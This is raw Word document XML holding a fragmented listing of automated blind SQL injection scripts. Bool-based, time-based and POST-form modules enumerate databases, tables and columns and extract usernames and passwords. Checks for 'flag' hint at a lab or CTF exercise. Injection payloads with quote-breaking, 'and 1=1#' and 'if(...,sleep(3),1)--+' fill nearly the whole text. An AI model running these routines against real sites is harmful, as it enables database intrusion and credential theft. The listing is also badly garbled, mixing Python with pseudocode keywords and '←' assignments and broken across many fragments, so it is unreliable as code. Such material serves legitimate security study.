    <w:p w14:paraId="0D97B99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   tbs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bs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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8BCE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</w:p>
    <w:p w14:paraId="1A3420A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CD61AC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CCE629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se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34AA19D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normalContextLen =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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD5FA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url += "?id=1' and " columns = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223ABB9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"&gt;Scanning columns...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B85D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21):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B72B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       for j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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC7A86" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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            id ← "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(select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 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schema.column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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5285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                 "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where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 '{2}' and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 '{3}'" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D89543" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1200" w:hangingChars="500" w:hanging="120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  " limit 0,1),{0},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)=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{1}--+".format(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, ascii(j)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se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30E2F0C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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3CAA9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           r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6B6811B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           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ormalContext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=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.tex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127D0E5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.                columns += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C36E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columns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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF2720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90DBFB9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F81111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values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, cols, table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579AD5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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FBEAD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url += "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C830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usrs ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBB6B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pwds ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCCE75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"&gt;Scanning values...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3C74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150):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FC98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for j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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532190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    id ← "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(select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{2}) from {3}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF70019" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="960" w:hangingChars="400" w:hanging="96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      " limit 0,1),{0},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)=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{1}--+".format(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, ascii(j), str(cols[0]), table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBC82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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9560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           r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59F5512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           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ormalContext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=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.tex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333761D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   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s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j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB16E0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s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srs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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D755E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   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150):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07DB9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       for j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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477FBA5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8.            id ← "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(select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{2}) from {3}" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CAC4C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="1680" w:hangingChars="700" w:hanging="168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  " limit 0,1),{0},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)=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{1}--+".format(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, ascii(j), str(cols[1]), table)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A896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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446B55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           r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_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57A7EB4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1.            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ormalContext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==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.tex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5FF8E0D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2.    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j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7B70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3.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wds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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396917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4.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%-12s%-12s' % ('username', 'password'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256717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5.   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s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w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zip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s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194BE52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6.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%-12s%-12s' % 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s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w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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA2095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64D2D1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9C7A71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bool_based_injection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2B611D9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dbs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db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47B9826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3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range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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CC5AA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1}." +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]), end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE52BE" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="240" w:hangingChars="100" w:hanging="2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db_selected ← int(input(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Pleas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put the database you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wann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scan:\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747924F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db_selected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- 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B8DF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tbs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tabl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12D30BB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range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tbs)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576098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1}." + str(tbs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]), end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5979C1" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="240" w:hangingChars="100" w:hanging="2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tb_selected ← int(input(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Pleas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put the table you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wann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scan (using word):\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0D3E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tb_selected ← tbs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b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- 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE294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cols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column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b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56B1381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range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cols)) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2B5C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1}. " + str(cols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]), end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C3ABAB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="48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input(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Pleas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put the columns you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wann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scan:\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D90F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col_selected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_selected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5BCE54E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5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values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b_selecte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159B01CD" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A0C294" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10558EF2" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D599209" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30443EFC" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>time_based_module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4531099C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A8B2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this_time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ime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trf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'%H:%H:%S'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ime.local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ime.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)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C8223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[' + st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his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+ ']' + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D57EC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06DA09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8B683E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s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3CEF97A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length ← 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99ADD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for L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1000) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0136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payload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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E677D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   "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gth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select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 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schema.tabl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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590705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wher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database()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=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{L}"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</w:p>
    <w:p w14:paraId="5131748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Getting length of all databases: ' + str(L))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150DD4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judge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payload) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4645AC0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current length of all databases:' + str(L))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5946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length ← L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777C44E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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B74E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elif L == 999:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671BEC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log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Canno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get length of all databases: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B0BCE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4B4C816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>11.tables_name ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D13D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length + 1) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE637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3.    log(f'\r正在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获取第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值：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s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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA8F9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scii_nu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9, 123) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663791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  payload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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512903AD" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720" w:hangingChars="300" w:hanging="72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f"(select ascii(mid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,{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},1)) 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schema.tabl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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EF704" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720" w:hangingChars="300" w:hanging="72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wher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database(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=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scii_nu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}"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</w:p>
    <w:p w14:paraId="7AD70EE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judge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payload) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27635B1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s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ch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scii_nu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29AAF4A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tables_list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s_name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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7855F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9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Tabl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attaining completed:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0987313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277B2D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514D43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B1E5AA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0689CC7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length ← 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F75791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for L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10000) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B390B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   payload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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2C39E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="720" w:hangingChars="300" w:hanging="72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gth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select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 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schema.column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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D78520" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="48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wher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ATABAS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AND " \                  f"""table_name=0x{str(binascii.b2a_hex(table_name.encode(r"utf-8")))  split("'")[1]}))={L}""" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1AF8D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</w:p>
    <w:p w14:paraId="41CA00C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log(f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Gettin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length of all fields from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：{L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C27C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judge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payload) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E00A6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length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of all fields of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: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC52A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length ← L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBE22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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520CEC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lif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L == 999:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AABBB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Canno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get length of all fields of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: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFE6C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4475E3FF" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B876D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length + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B401B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scii_nu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9, 123):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B229E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    payload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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FFA3F8" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="960" w:hangingChars="400" w:hanging="96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f"(select ascii(mid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_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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,{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},1)) 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schema.column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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B423B8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wher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ATABAS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) AND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=" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F2B376" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="456" w:left="958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""0x{str(binascii.b2a_hex(table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ame.encode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r"utf-8"))).split("'")[1]})={ascii_num}""" \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</w:p>
    <w:p w14:paraId="37DB94A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judge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payload) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE29BE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>18.columns_name += ch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scii_nu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79834FC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columns_list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name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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D981F9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0.log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Attainin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of all fields from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 completed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000DAC5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BD57529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6FC653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BC38EB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get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ata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hose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4848363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columns_name ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1553B29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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F64A6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f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",{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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71922B0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length ← 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8ADB2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for L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10000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05646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   payload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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA382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"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gth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(select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cat_w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:'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)) from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hose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))={L}""" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78535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  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</w:p>
    <w:p w14:paraId="4921BBB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Gettin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length of all records from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hose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: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A710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judge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payload) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E2F4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Curre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length of all fields from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hose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: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A93AB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length ← L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E82F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.break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6132A9D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elif L == 9999:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABCB0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Canno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get length of all fields from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hose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: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99489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3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0F8218A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4.data ← []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9868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5.data_str ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BABCA0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, length + 1) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872639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    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scii_nu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9, 123):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07631A5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           payload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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF5E220" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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f"(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lect  ascii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mid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ncat_w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:'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)),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,1)) from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hose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)" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0EF1F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr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       f"=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scii_nu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} " +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</w:p>
    <w:p w14:paraId="341237B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if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judge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payload) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0AEA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ata_st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= chr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ascii_nu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61689BC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1.data_list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ata_str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,')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052CDEB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2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ata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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569AA0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3.  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ata.append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.spl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:'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD100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4.end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474BF66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5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Retrievin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of data from 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hose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 completed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48392A9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4245DF0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234B40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AEB435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judge_time(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E832F6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time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_get_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payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF6C1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if 3 &lt;= time &lt; 6 then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA2CC8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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D41E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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25A26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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D4AD92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513BDEA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16987D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html_get_time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588DD23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req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ssi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53C5A8B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ua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serAge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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E7866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headers ← {'User-Agent':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a.rando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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1BB6D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timeout ← 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B415FD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response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, headers=headers, timeout=timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607AFBA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FED3182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991383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327919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html_is_exist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600848D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req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s.ge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38DFE9F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if req then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011EFAC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 True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88570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 False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358059A1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7FB348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B1B796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time_based_injection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080C89F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payload_header ← "' and if("</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641632C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payload_end ← ",sleep(3),1)--+"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7F3C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s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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F3B0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   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1}.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s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]}', end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C88EC7" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="240" w:hangingChars="100" w:hanging="2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chose_table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ables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int(input('\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Pleas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put name of the table required:\n')) - 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A3F36" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="240" w:hangingChars="100" w:hanging="2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columns_list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column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hose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62F7C91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) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E971D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'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+ 1}.{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]}', end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C0DE5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061F2B12" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="240" w:hangingChars="100" w:hanging="24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data ←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et_dat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hose_tab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head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ayload_en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74C3F52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do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9FD78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3.    print(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.ljust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20), end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CC05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 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'\n' + '-' *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* 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590BC96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for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in data do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B7C8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16.    for j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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924C1F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7.          print(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j.ljust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20), end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423153A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8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'\n' + '-' *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e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umns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 * 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796224D9" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr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9.end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C7F1C" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57152CC3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62631BA4" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F284483" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>post.bool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16D9189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content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2190A81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his_ti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ime.strftime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'%H:%H:%S'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ime.localti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ime.ti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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CD79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Output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ored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[' + st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his_ti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+ '] ', 'green') + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47378AE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8D8B1F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_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2FEF6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data_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encod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data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF1AE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data_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.encode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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6FDE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 ←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.urlopen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=data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5536A04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Outp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str(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.read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.decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF306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AE01E1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can_inject_bool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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EED67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.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Start to use bool-based blind injection...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA7183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test_list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[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"'", '"', "')", '")']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685875D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for item in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est_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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD4F4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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7745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: "admin" + item + ' and 1=1#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8139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'passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA5433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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10F61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res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, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBCB68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soup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s, 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51B3366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fonts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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633AF3B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if "flag" in str(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0]) then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A3CB2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Use ' + item + ' -&gt; Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6838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.  return True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1518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 else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0250D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'Use ' + item + ' -&gt; Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE3E79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537D755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A4CA50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xe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unc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, function)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964E75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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0D06D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0 to 21 do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB81E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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574440A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: symbol + ' or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ength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 + function + ')← {0}#'.format(str(i))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7070510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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1730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lastRenderedPageBreak/>
        <w:t xml:space="preserve">       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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2705B1C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_len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2081CC8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2E910BF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0D8525A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 str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fonts[0])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.jp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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801409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length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</w:p>
    <w:p w14:paraId="7318D0E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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A13102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85F60B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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F11D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= [ch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1 to 127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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B72FE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4E73B9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ength + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6B87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j in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</w:p>
    <w:p w14:paraId="6F40BE6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21D515D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: symbol + " or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 + function + f",{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},1)← '{j}'#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B48BC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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5763895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2097C67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79A5752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5B8B722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0FA6B25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"flag" in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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091540C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if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not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j.lower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)and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not exis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j.upp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)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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61CA9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2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+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j.lower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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A699B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3. Outp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j.lower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, end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364C40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l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se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if not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j.isalpha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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1D8C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5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b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+ j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A60AA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6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O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j, end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3A9F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O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10CD62B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251FB5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E237300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0FF844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table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oo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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582FB0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s_ ← ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5F85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nd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 to length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75060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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7463D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21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152775F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{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25E5616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:  symbol + " or (select length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from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chema.table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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD713C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" where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base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limit " + st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+ ",1)←{0}#".format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351F4F5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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D340C3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20C619C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lastRenderedPageBreak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_len←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6AD8128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soup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7E4ABA9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13E47FD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.jp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" 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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4008CD8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ength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</w:p>
    <w:p w14:paraId="2CC22C0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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020F7C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s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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDFC8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ist(set(ch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.lower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) for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in range(32, 127)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CED0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ength + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFF063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j in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</w:p>
    <w:p w14:paraId="459EDE9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data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{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7ACE734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: symbol + " or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selec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from ""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schema.table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where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23.        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base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" "limit " + st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+ ",1),{0},1)←'{1}'#".format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j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28CFD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'passwd': '1'</w:t>
      </w:r>
    </w:p>
